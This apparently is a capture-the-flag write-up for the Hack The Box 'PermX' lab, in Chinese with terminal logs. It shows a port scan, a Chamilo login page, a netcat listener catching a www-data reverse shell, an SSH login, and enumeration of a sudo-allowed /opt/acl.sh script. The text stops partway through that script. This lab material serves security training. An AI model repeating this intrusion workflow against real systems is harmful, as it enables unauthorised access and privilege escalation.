└──╼ [★]$ nmap -sV 10.10.11.23 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 12:35 CDT Nmap scan report for 10.10.11.23 Host is up (0.0022s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.52 Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds
└──╼ [★]$ echo"10.10.11.23 www.permx.htb" | sudo tee -a /etc/hosts 10.10.11.23 www.permx.htb ┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-mn1y31pgmb]─[~] └──╼ [★]$ echo"10.10.11.23 lms.permx.htb" | sudo tee -a /etc/hosts 10.10.11.23 lms.permx.htb
www 就是首頁沒錯,但 lms 看到一個登入頁面:
查一下這是什麼酷東西:
Chamilo is a free software (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and the building of a network of services providers and software contributors.
└──╼ [★]$ nc -tlnp 4444 bash: cannot set terminal process group (1173): Inappropriate ioctl for device bash: no job control in this shell www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$
└──╼ [★]$ ssh [email protected] The authenticity of host '10.10.11.23 (10.10.11.23)' can't be established. ED25519 key fingerprint is SHA256:u9/wL+62dkDBqxAG3NyMhz/2FTBJlmVC1Y1bwaNLqGA. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.11.23' (ED25519) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64)
System information as of Sun Aug 11 06:09:41 PM UTC 2024
System load: 0.0 Usage of /: 59.7% of 7.19GB Memory usage: 23% Swap usage: 0% Processes: 247 Users logged in: 1 IPv4 address for eth0: 10.10.11.23 IPv6 address for eth0: dead:beef::250:56ff:feb9:c054
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Aug 11 15:49:24 2024 from 10.10.14.21 mtz@permx:~$
mtz@permx:~$ ls sudoers user.txt mtz@permx:~$ sudo -l Matching Defaults entries for mtz on permx: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User mtz may run the following commands on permx: (ALL : ALL) NOPASSWD: /opt/acl.sh mtz@permx:~$ ls -l /opt/acl.sh -rwxr-xr-x 1 root root 419 Jun 5 11:58 /opt/acl.sh mtz@permx:~$ cat /opt/acl.sh #!/bin/bash
if [ "$#" -ne 3 ]; then /usr/bin/echo "Usage: $0 user perm file" exit 1 fi
user="$1" perm="$2" target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then /usr/bin/echo "Access denied." exit 1 fi
# Check if the path is a file if [ ! -f "$target" ]; then /usr/bin/echo "Target must be a file." exit 1 fi